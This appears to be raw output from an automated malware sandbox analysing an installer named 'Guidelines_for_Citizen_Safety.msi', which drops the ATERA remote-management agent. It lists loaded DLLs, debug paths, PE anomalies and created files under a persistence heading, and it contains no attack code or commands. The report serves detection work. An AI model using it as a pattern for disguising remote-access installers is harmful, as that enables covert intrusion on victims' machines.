                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile written: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: Guidelines_for_Citizen_Safety.msiStatic file information: File size 2994176 > 1048576
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb2|1\F source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000000.1743436849.000002AC4FE22000.00000002.00000001.01000000.00000018.sdmp, AgentPackageAgentInformation.exe.15.dr
                              Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1452340287.0000000007450000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1602449484.00000000070A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, AlphaControlAgentInstallation.dll.5.dr, AlphaControlAgentInstallation.dll.6.dr, AlphaControlAgentInstallation.dll.18.dr, AlphaControlAgentInstallation.dll.4.dr
                              Source: Binary string: \??\C:\Windows\symbols\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000012.00000002.1599979903.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Windows\System.pdbpdbtem.pdbh. source: rundll32.exe, 00000012.00000003.1599173420.00000000070CD000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AgentPackageAgentInformation.exe, 00000013.00000002.1778395763.000002AC68ED2000.00000002.00000001.01000000.0000001B.sdmp, Newtonsoft.Json.dll.15.dr
                              Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: rundll32.exe, 00000005.00000002.1452340287.0000000007477000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000D.00000000.1477735807.00000158EC7A2000.00000002.00000001.01000000.00000010.sdmp, AteraAgent.exe.2.dr
                              Source: Binary string: \??\C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000005.00000002.1450208878.0000000002F24000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2644921266.00000188B0072000.00000002.00000001.01000000.0000001C.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1778395763.000002AC68ED2000.00000002.00000001.01000000.0000001B.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.15.dr, Newtonsoft.Json.dll.18.dr
                              Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000013.00000002.1777176033.000002AC50642000.00000002.00000001.01000000.0000001A.sdmp, Atera.AgentPackage.Common.dll.15.dr
                              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdb source: System.ValueTuple.dll.2.dr
                              Source: Binary string: n\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000005.00000002.1449544023.0000000002947000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1599311531.00000000004E7000.00000004.00000010.00020000.00000000.sdmp
                              Source: Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: Guidelines_for_Citizen_Safety.msi, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, 6c6861.msi.2.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.dr
                              Source: Binary string: dows\dll\System.pdb source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\symbols\dll\AlphaControlAgentInstallation.pdbw source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr
                              Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000013.00000002.1777176033.000002AC50642000.00000002.00000001.01000000.0000001A.sdmp, Atera.AgentPackage.Common.dll.15.dr
                              Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000012.00000003.1599173420.00000000070CD000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdbg, source: rundll32.exe, 00000012.00000003.1599173420.00000000070CD000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.PDBI source: rundll32.exe, 00000012.00000002.1599979903.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr
                              Source: Binary string: \??\C:\Windows\System.pdbI source: rundll32.exe, 00000012.00000002.1602449484.00000000070A0000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ?*nC:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.pdbc source: rundll32.exe, 00000012.00000002.1599311531.00000000004E7000.00000004.00000010.00020000.00000000.sdmp
                              Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000D.00000000.1477735807.00000158EC7A2000.00000002.00000001.01000000.00000010.sdmp, AteraAgent.exe.2.dr
                              Source: Binary string: \??\C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.PDB source: rundll32.exe, 00000005.00000002.1450208878.0000000002F24000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdbSHA256 source: System.ValueTuple.dll.2.dr
                              Source: Binary string: \??\C:\Windows\System.pdbC source: rundll32.exe, 00000012.00000002.1602449484.00000000070A0000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000D.00000002.1536773813.00000158EEE32000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll.2.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000D.00000002.1536773813.00000158EEE32000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll.2.dr
                              Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb` source: rundll32.exe, 00000012.00000002.1599979903.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdble source: rundll32.exe, 00000012.00000002.1599979903.0000000002E3D000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ?*nC:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000005.00000002.1449544023.0000000002947000.00000004.00000010.00020000.00000000.sdmp
                              Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: Guidelines_for_Citizen_Safety.msi, MSI7013.tmp.2.dr, 6c6863.msi.2.dr, MSIA9F5.tmp.2.dr, MSI87B3.tmp.2.dr, MSI6A36.tmp.2.dr, 6c6861.msi.2.dr
                              Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 0000000F.00000002.2649410681.00000188B0742000.00000002.00000001.01000000.0000001D.sdmp, ICSharpCode.SharpZipLib.dll.2.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbo source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdbx5 source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 0000000F.00000002.2649410681.00000188B0742000.00000002.00000001.01000000.0000001D.sdmp, ICSharpCode.SharpZipLib.dll.2.dr
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2644921266.00000188B0072000.00000002.00000001.01000000.0000001C.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.18.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbg source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdbsec source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.pdby source: rundll32.exe, 00000012.00000002.1599979903.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp
                              Source: BouncyCastle.Crypto.dll.2.drStatic PE information: 0xE49A52B3 [Sun Jul 15 06:22:43 2091 UTC]
                              Source: MSIA9F5.tmp.2.drStatic PE information: real checksum: 0x32353 should be: 0x88610
                              Source: MSI87B3.tmp.2.drStatic PE information: real checksum: 0x32353 should be: 0x88610
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_06F184A1 push es; ret 5_3_06F184B0
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB487C29 push eax; retf 15_2_00007FFAAB487C6D
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB480AD8 pushad ; ret 15_2_00007FFAAB480AE1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB4878F3 push ebx; retf 15_2_00007FFAAB48796A
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB670F68 push eax; ret 15_2_00007FFAAB670F94
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_3_06B58420 push es; ret 18_3_06B584B0
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 19_2_00007FFAAB4400BD pushad ; iretd 19_2_00007FFAAB4400C1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB4600BD pushad ; iretd 23_2_00007FFAAB4600C1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB475587 push ebp; iretd 23_2_00007FFAAB4755D8
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 25_2_00007FFAAB4700BD pushad ; iretd 25_2_00007FFAAB4700C1

                              Persistence and Installation Behavior

                              barindex
                              Creates files in the system32 config directory
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1A374813EDB1A6631387E414D3E73232
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1A374813EDB1A6631387E414D3E73232
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BA74182F76F15A9CF514DEF352303C95
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8A93.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI87B3.tmpJump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeJump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA9F5.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6A36.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8C79.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8B30.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7013.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA9F5.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8A93.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6A36.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
